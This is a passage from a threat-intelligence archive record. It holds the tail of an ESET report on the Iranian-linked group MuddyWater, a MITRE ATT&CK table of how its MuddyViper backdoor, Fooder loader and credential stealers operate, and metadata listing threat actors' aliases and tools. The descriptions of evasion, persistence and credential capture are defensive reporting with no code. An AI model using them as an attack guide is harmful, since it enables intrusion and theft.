demonstrate the ability to execute campaigns ranging from average to above average, i.e., being\r\ntimely, effective, and increasingly challenging to defend against. 
While we assess that MuddyWater will remain a leading\r\nactor in Iranian-nexus activity, we anticipate a continued pattern of typical campaigns enhanced by more advanced TTPs.\r\nESET will continue to monitor the group’s activities, focusing on further signs of technical advancement and strategic\r\ntargeting of government, military, telecommunications, and critical infrastructure.\r\nFor any inquiries about our research published on WeLiveSecurity, please contact us at threatintel@eset.com. \r\nESET Research offers private APT intelligence reports and data feeds. For any inquiries about this service, visit\r\nthe ESET Threat Intelligence page.\r\nIoCs\r\nFiles\r\nNetwork\r\nMITRE ATT\u0026CK techniques\r\nThis table was built using version 17 of the MITRE ATT\u0026CK framework.\r\nTactic ID Name Description\r\nReconnaissance T1591\r\nGather Victim Org\r\nInformation\r\nMuddyWater gathers victim org info to use in\r\nspearphishing emails.\r\nResource\r\nDevelopment\r\nT1583 Acquire Infrastructure MuddyWater uses acquired infrastructure to host\r\nmalware download locations and C\u0026C servers.\r\nT1608 Stage 
Capabilities\r\nMuddyWater stages tools like RMM tools and data\r\nstealers on file-hosting sites such as OneHub and Mega\r\nLimited.\r\nT1587.001\r\nDevelop Capabilities:\r\nMalware\r\nMuddyWater develops backdoors like MuddyViper and\r\ntools such as the Fooder loader, LP-Notes credential\r\nstealer, and the Blub and CE-Notes browser-data\r\nstealers.\r\nT1588.002\r\nObtain Capabilities:\r\nTool\r\nMuddyWater uses publicly available tools from GitHub,\r\nsuch as HackBrowserData and Go-based reverse\r\nproxies.\r\nInitial Access T1566.002\r\nPhishing: Spearphishing\r\nLink\r\nMuddyWater uses spearphishing emails with links to\r\nfile hosting sites like OneHub and Mega Limited to host\r\nRMM software (Atera, Level, and PDQ).\r\nExecution\r\nT1059.001\r\nCommand-Line\r\nInterface: PowerShell\r\nMuddyViper has the capability to open and execute\r\nPowerShell scripts.\r\nT1059.003\r\nCommand-Line\r\nInterface: Windows\r\nCommand Shell\r\nMuddyViper has the capability to offer the Windows\r\nCommand shell as a reverse shell.\r\nT1559.001\r\nInter-Process\r\nCommunication:\r\nComponent Object\r\nModel\r\nMuddyViper uses the ITaskService COM object to\r\ncreate a scheduled task for persistence.\r\nT1106 Native API MuddyViper uses the CreateProcess API to execute\r\nadditional files and commands.\r\nT1204.001\r\nUser Execution:\r\nMalicious Link\r\nMuddyWater operators rely on targets clicking\r\nmalicious links delivered through spearphishing.\r\nPersistence\r\nT1547.001\r\nBoot or Logon Autostart\r\nExecution: Registry Run\r\nKeys / Startup Folder\r\nMuddyViper has the capability to copy itself to the\r\nvictim’s Startup folder.\r\nT1543.003\r\nCreate or Modify\r\nSystem Process:\r\nWindows Service\r\nMuddyWater operators attempt to install RMM tools in\r\n%PROGRAMFILES%, which also includes creating a\r\nWindows service set to autostart.\r\nT1053 Scheduled Task/Job\r\nMuddyViper can be persisted as a scheduled task named\r\nManageOnDriveUpdater.\r\nDefense\r\nEvasion 
T1134.001\r\nAccess Token\r\nManipulation: Token\r\nImpersonation/Theft\r\nThe LP-Notes and CE-Notes tools attempt to\r\nimpersonate a logged-on user’s security context via\r\nImpersonateLoggedOnUser.\r\nT1140\r\nDeobfuscate/Decode\r\nFiles or Information\r\nBlub uses string obfuscation for storing stolen data.\r\nFooder can extract embedded, AES-encrypted payloads.\r\nCE-Notes and LP-Notes both use a custom byte-wise\r\ndecryption routine to decrypt strings.\r\nT1620\r\nReflective Code\r\nLoading\r\nThe Fooder loader performs reflective code loading to\r\nrun additional tools (MuddyViper, reverse tunnels, and\r\nHackBrowserData).\r\nT1497.003\r\nVirtualization/Sandbox\r\nEvasion: Time Based\r\nEvasion\r\nMuddyViper uses many calls to a sleep function to\r\ndetect and avoid virtualization and analysis\r\nenvironments, and generally to inhibit dynamic\r\nanalysis.\r\nT1027.007\r\nObfuscated Files or\r\nInformation: Dynamic\r\nAPI Resolution\r\nCE-Notes and LP-Notes perform dynamic API\r\nresolution by decrypting strings at runtime.\r\nT1134.002\r\nAccess Token\r\nManipulation: Create\r\nProcess with Token\r\nFooder’s launcher attempts to duplicate the token of a\r\nprocess specified by the operator when launching\r\nFooder via CreateProcessAsUserA.\r\nT1622 Debugger Evasion\r\nMuddyViper searches for specific debugging tools,\r\nadjusting its behavior accordingly.\r\nT1070.009\r\nIndicator Removal:\r\nClear Persistence\r\nMuddyViper can modify registry keys used for\r\npersistence, if instructed to uninstall itself.\r\nT1070.004\r\nIndicator Removal: File\r\nDeletion\r\nMuddyViper can delete itself from the system, if\r\ninstructed to uninstall itself.\r\nT1036 Masquerading\r\nSome versions of Fooder masquerade as an innocuous\r\nSnake game.\r\nT1036.004\r\nMasquerading:\r\nMasquerade Task or\r\nService\r\nMuddyViper can create a task named\r\nManageOnDriveUpdater.\r\nT1112 Modify Registry\r\nMuddyViper can modify the\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Startup and\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Startup registry keys, to\r\nchange the location of the Startup folder.\r\nT1027.009\r\nObfuscated Files or\r\nInformation: Embedded\r\nPayloads\r\nFooder can extract an embedded, AES-encrypted\r\npayload.\r\nT1027.013\r\nObfuscated Files or\r\nInformation:\r\nEncrypted/Encoded File\r\nFooder can extract an embedded, AES-encrypted\r\npayload.\r\nCredential\r\nAccess\r\nT1555.003\r\nCredentials from\r\nPassword Stores:\r\nCredentials from Web\r\nBrowsers\r\nCE-Notes and Blub attempt to steal credentials stored in\r\nbrowsers.\r\nT1056.002\r\nInput Capture: GUI\r\nInput Capture\r\nMuddyViper and LP-Notes have the ability to display a\r\nWindows security login prompt to capture login\r\ncredentials and confirm the credentials’ veracity by\r\nrelaying those credentials to legitimate Windows APIs.\r\nDiscovery\r\nT1082\r\nSystem Information\r\nDiscovery\r\nMuddyViper collects system information from\r\ncompromised systems and reports it back to the C\u0026C\r\nserver.\r\nT1518.001\r\nSoftware Discovery:\r\nSecurity Software\r\nDiscovery\r\nMuddyViper attempts to get a process list of running\r\napplications, looks for security-related processes and, if\r\nfound, reports them to the C\u0026C server and modifies its\r\nbehavior.\r\nCollection\r\nT1074.001\r\nData Staged: Local Data\r\nStaging\r\nBlub, CE-Notes, and LP-Notes stage stolen credentials\r\non disk for MuddyViper, reverse tunnels, or RMM tools\r\nto collect and exfiltrate.\r\nT1560.001\r\nArchive Collected Data:\r\nArchive via Utility\r\nMuddyViper uses PowerShell’s Compress-Archive\r\ncommand to compress browser data 
collected via the\r\nHackBrowserData utility.\r\nCommand and\r\nControl\r\nT1573.001\r\nEncrypted Channel:\r\nSymmetric\r\nCryptography\r\nMuddyViper uses AES-CBC encryption to encrypt data\r\nbefore exchanging data with the C\u0026C server.\r\nT1219\r\nRemote Access\r\nSoftware\r\nMuddyWater uses Atera, Level, and PDQ RMM tools for\r\nremote access to victims’ systems.\r\nT1071.001\r\nApplication Layer\r\nProtocol: Web Protocols\r\nMuddyViper uses HTTPS for C\u0026C communications.\r\nThe reverse tunnels use a mixture of HTTP and HTTPS\r\nfor C\u0026C communications.\r\nT1105 Ingress Tool Transfer\r\nMuddyViper has the capability to download additional\r\npayloads from its C\u0026C server.\r\nT1001 Data Obfuscation\r\nMuddyViper leverages HTTPS for C\u0026C\r\ncommunications, using the Status header to hide a\r\nbackdoor command ID in the server-to-client direction\r\nof the communication.\r\nT1090 Proxy MuddyWater uses customized versions of go‑socks5\r\nreverse proxy tools.\r\nExfiltration\r\nT1041\r\nExfiltration Over C2\r\nChannel\r\nMuddyWater tools exfiltrate data to C\u0026C servers using\r\nC\u0026C channels (HTTP and HTTPS).\r\nT1030\r\nData Transfer Size\r\nLimits\r\nMuddyViper supports downloading/uploading files in\r\nchunks of limited size.\r\nSource: https://www.welivesecurity.com/en/eset-research/muddywater-snakes-riverbank/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.welivesecurity.com/en/eset-research/muddywater-snakes-riverbank/"
	],
	"report_names": [
		"muddywater-snakes-riverbank"
	],
	"threat_actors": [
		{
			"id": "cde987a8-c71f-49e2-b761-5b7fa2b4ada6",
			"created_at": "2022-10-25T16:07:23.706646Z",
			"updated_at": "2026-04-29T06:58:57.945122Z",
			"deleted_at": null,
			"main_name": "Hexane",
			"aliases": [
				"ATK 120",
				"Cobalt Lyceum",
				"G1001",
				"Lyceum",
				"Operation Out to Sea",
				"Siamesekitten",
				"Yellow Dev 9"
			],
			"source_name": "ETDA:Hexane",
			"tools": [
				"DanBot",
				"DanDrop",
				"Decrypt-RDCMan.ps1",
				"Get-LAPSP.ps1",
				"James",
				"Milan",
				"kl.ps1"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "02e1c2df-8abd-49b1-91d1-61bc733cf96b",
			"created_at": "2022-10-25T15:50:23.308924Z",
			"updated_at": "2026-04-29T06:58:57.745497Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"MuddyWater",
				"Earth Vetala",
				"Static Kitten",
				"Seedworm",
				"TEMP.Zagros",
				"Mango Sandstorm",
				"TA450",
				"MuddyKrill"
			],
			"source_name": "MITRE:MuddyWater",
			"tools": [
				"MuddyViper",
				"STARWHALE",
				"LP-Notes",
				"POWERSTATS",
				"Rclone",
				"Out1",
				"Tsundere Botnet",
				"PowerSploit",
				"Small Sieve",
				"Fooder",
				"Mori",
				"Mimikatz",
				"LaZagne",
				"PowGoop",
				"CrackMapExec",
				"ConnectWise",
				"SHARPSTATS",
				"RemoteUtilities",
				"Koadic"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-29T06:58:56.539549Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"ControlX",
				"TAG-22",
				"AQUATIC PANDA",
				"Red Dev 10",
				"RedHotel",
				"BountyGlad",
				"Red Scylla",
				"CHROMIUM",
				"BRONZE UNIVERSITY",
				"Charcoal Typhoon"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"FunnySwitch",
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "2ed8d590-defa-4873-b2de-b75c9b30931e",
			"created_at": "2023-01-06T13:46:38.730137Z",
			"updated_at": "2026-04-29T06:58:56.310338Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"ATK51",
				"Boggy Serpens",
				"Earth Vetala",
				"Static Kitten",
				"COBALT ULSTER",
				"Mango Sandstorm",
				"TA450",
				"TEMP.Zagros",
				"Seedworm",
				"G0069"
			],
			"source_name": "MISPGALAXY:MuddyWater",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "cffb3c01-038f-4527-9cfd-57ad5a035c22",
			"created_at": "2022-10-25T15:50:23.38055Z",
			"updated_at": "2026-04-29T06:58:57.692044Z",
			"deleted_at": null,
			"main_name": "OilRig",
			"aliases": [
				"COBALT GYPSY",
				"IRN2",
				"APT34",
				"Helix Kitten",
				"Evasive Serpens",
				"Hazel Sandstorm",
				"EUROPIUM",
				"ITG13",
				"Earth Simnavaz",
				"Crambus",
				"TA452"
			],
			"source_name": "MITRE:OilRig",
			"tools": [
				"ISMInjector",
				"ODAgent",
				"RDAT",
				"Systeminfo",
				"QUADAGENT",
				"OopsIE",
				"ngrok",
				"Tasklist",
				"certutil",
				"ZeroCleare",
				"POWRUNER",
				"netstat",
				"Solar",
				"ipconfig",
				"LaZagne",
				"BONDUPDATER",
				"SideTwist",
				"OilBooster",
				"SampleCheck5000",
				"PsExec",
				"SEASHARPEE",
				"Mimikatz",
				"PowerExchange",
				"OilCheck",
				"RGDoor",
				"ftp"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "a7df240e-6750-4b71-99de-85831b92faa2",
			"created_at": "2022-10-25T15:50:23.859253Z",
			"updated_at": "2026-04-29T06:58:57.731816Z",
			"deleted_at": null,
			"main_name": "HEXANE",
			"aliases": [
				"Lyceum",
				"Siamesekitten",
				"Spirlin"
			],
			"source_name": "MITRE:HEXANE",
			"tools": [
				"Milan",
				"netstat",
				"BITSAdmin",
				"DnsSystem",
				"DanBot",
				"ipconfig",
				"Mimikatz",
				"Kevin",
				"PoshC2"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "fb8f3a5f-01a9-498e-9396-52f844424c33",
			"created_at": "2023-01-06T13:46:39.045338Z",
			"updated_at": "2026-04-29T06:58:56.41469Z",
			"deleted_at": null,
			"main_name": "LYCEUM",
			"aliases": [
				"COBALT LYCEUM",
				"UNC1530",
				"Spirlin",
				"MYSTICDOME",
				"siamesekitten",
				"Chrono Kitten",
				"Storm-0133"
			],
			"source_name": "MISPGALAXY:LYCEUM",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "3c430d71-ab2b-4588-820a-42dd6cfc39fb",
			"created_at": "2022-10-25T16:07:23.880522Z",
			"updated_at": "2026-04-29T06:58:58.009074Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"ATK 51",
				"Boggy Serpens",
				"Cobalt Ulster",
				"G0069",
				"ITG17",
				"Mango Sandstorm",
				"MuddyWater",
				"Operation BlackWater",
				"Operation Earth Vetala",
				"Operation Quicksand",
				"Seedworm",
				"Static Kitten",
				"T-APT-14",
				"TA450",
				"TEMP.Zagros",
				"Yellow Nix"
			],
			"source_name": "ETDA:MuddyWater",
			"tools": [
				"Agentemis",
				"BugSleep",
				"CLOUDSTATS",
				"ChromeCookiesView",
				"Cobalt Strike",
				"CobaltStrike",
				"CrackMapExec",
				"DCHSpy",
				"DELPHSTATS",
				"EmPyre",
				"EmpireProject",
				"FruityC2",
				"Koadic",
				"LOLBAS",
				"LOLBins",
				"LaZagne",
				"Living off the Land",
				"MZCookiesView",
				"Meterpreter",
				"Mimikatz",
				"MuddyC2Go",
				"MuddyRot",
				"Mudwater",
				"POWERSTATS",
				"PRB-Backdoor",
				"PhonyC2",
				"PowGoop",
				"PowerShell Empire",
				"PowerSploit",
				"Powermud",
				"QUADAGENT",
				"SHARPSTATS",
				"SSF",
				"Secure Socket Funneling",
				"Shootback",
				"Smbmap",
				"Valyria",
				"chrome-passwords",
				"cobeacon",
				"prb_backdoor"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "156b3bc5-14b7-48e1-b19d-23aa17492621",
			"created_at": "2025-08-07T02:03:24.793494Z",
			"updated_at": "2026-04-29T06:58:57.501827Z",
			"deleted_at": null,
			"main_name": "COBALT ULSTER",
			"aliases": [
				"Boggy Serpens ",
				"ENT-11 ",
				"Earth Vetala ",
				"ITG17 ",
				"MERCURY ",
				"Mango Sandstorm ",
				"MuddyWater ",
				"STAC 1171 ",
				"Seedworm ",
				"Static Kitten ",
				"TA450 ",
				"TEMP.Zagros ",
				"UNC3313 ",
				"Yellow Nix "
			],
			"source_name": "Secureworks:COBALT ULSTER",
			"tools": [
				"CrackMapExec",
				"Empire",
				"FORELORD",
				"Koadic",
				"LaZagne",
				"Metasploit",
				"Mimikatz",
				"Plink",
				"PowerStats"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "386b1b0a-9217-46d4-a0d6-73d6286154e0",
			"created_at": "2025-08-07T02:03:24.760429Z",
			"updated_at": "2026-04-29T06:58:57.492935Z",
			"deleted_at": null,
			"main_name": "COBALT LYCEUM",
			"aliases": [
				"DEV-0133 ",
				"HEXANE ",
				"ScorchedEpoch "
			],
			"source_name": "Secureworks:COBALT LYCEUM",
			"tools": [
				"DanBot",
				"MilanRAT",
				"RGDoor",
				"SharkWork RAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "c786e025-c267-40bd-9491-328da70811a5",
			"created_at": "2025-08-07T02:03:24.736817Z",
			"updated_at": "2026-04-29T06:58:57.579232Z",
			"deleted_at": null,
			"main_name": "COBALT GYPSY",
			"aliases": [
				"APT34 ",
				"CHRYSENE ",
				"Crambus ",
				"EUROPIUM ",
				"Hazel Sandstorm ",
				"Helix Kitten ",
				"ITG13 ",
				"OilRig ",
				"Yellow Maero "
			],
			"source_name": "Secureworks:COBALT GYPSY",
			"tools": [
				"Glimpse",
				"Helminth",
				"Jason",
				"MacDownloader",
				"PoisonFrog",
				"RGDoor",
				"ThreeDollars",
				"TinyZbot",
				"Toxocara",
				"Trichuris",
				"TwoFace"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "67709937-2186-4a32-b64c-a5693d40ac77",
			"created_at": "2023-01-06T13:46:38.495593Z",
			"updated_at": "2026-04-29T06:58:56.229515Z",
			"deleted_at": null,
			"main_name": "OilRig",
			"aliases": [
				"Cobalt Gypsy",
				"Helix Kitten",
				"APT34",
				"ATK40",
				"G0049",
				"EUROPIUM",
				"TA452",
				"Earth Simnavaz",
				"Twisted Kitten",
				"Crambus",
				"APT 34",
				"IRN2",
				"Evasive Serpens",
				"Hazel Sandstorm"
			],
			"source_name": "MISPGALAXY:OilRig",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-29T06:58:57.572831Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-29T06:58:57.866084Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-29T06:58:57.704537Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "b6436f7b-6012-4969-aed1-d440e2e8b238",
			"created_at": "2022-10-25T16:07:23.91517Z",
			"updated_at": "2026-04-29T06:58:58.033485Z",
			"deleted_at": null,
			"main_name": "OilRig",
			"aliases": [
				"APT 34",
				"ATK 40",
				"Chrysene",
				"Cobalt Gypsy",
				"Crambus",
				"DEV-0861",
				"EUROPIUM",
				"Earth Simnavaz",
				"Evasive Serpens",
				"G0049",
				"Hazel Sandstorm",
				"Helix Kitten",
				"IRN2",
				"ITG13",
				"Scarred Manticore",
				"Storm-0861",
				"TA452",
				"Twisted Kitten",
				"UNC1860",
				"Yellow Maero"
			],
			"source_name": "ETDA:OilRig",
			"tools": [
				"AMATIAS",
				"Agent Drable",
				"Agent Injector",
				"AgentDrable",
				"Alma Communicator",
				"BONDUPDATER",
				"CACTUSPIPE",
				"Clayslide",
				"CypherRat",
				"DNSExfitrator",
				"DNSpionage",
				"DROPSHOT",
				"DistTrack",
				"DropperBackdoor",
				"Fox Panel",
				"GREYSTUFF",
				"GoogleDrive RAT",
				"HighShell",
				"HyperShell",
				"ISMAgent",
				"ISMDoor",
				"ISMInjector",
				"Jason",
				"Karkoff",
				"LIONTAIL",
				"LOLBAS",
				"LOLBins",
				"LONGWATCH",
				"LaZagne",
				"Living off the Land",
				"MailDropper",
				"Mimikatz",
				"MrPerfectInstaller",
				"OILYFACE",
				"OopsIE",
				"POWBAT",
				"POWRUNER",
				"Plink",
				"Poison Frog",
				"PowerExchange",
				"PsList",
				"PuTTY Link",
				"QUADAGENT",
				"RDAT",
				"RGDoor",
				"SEASHARPEE",
				"Saitama",
				"Saitama Backdoor",
				"Shamoon",
				"SideTwist",
				"SpyNote",
				"SpyNote RAT",
				"StoneDrill",
				"TONEDEAF",
				"TONEDEAF 2.0",
				"ThreeDollars",
				"TwoFace",
				"VALUEVAULT",
				"Webmask",
				"WinRAR",
				"ZEROCLEAR",
				"ZeroCleare",
				"certutil",
				"certutil.exe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1777429339,
	"ts_updated_at": 1777450868,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5c778a0a80a658b98989a084d150dd58e2286dc8.pdf",
		"text": "https://archive.orkl.eu/5c778a0a80a658b98989a084d150dd58e2286dc8.txt",
		"img": "https://archive.orkl.eu/5c778a0a80a658b98989a084d150dd58e2286dc8.jpg"
	}
}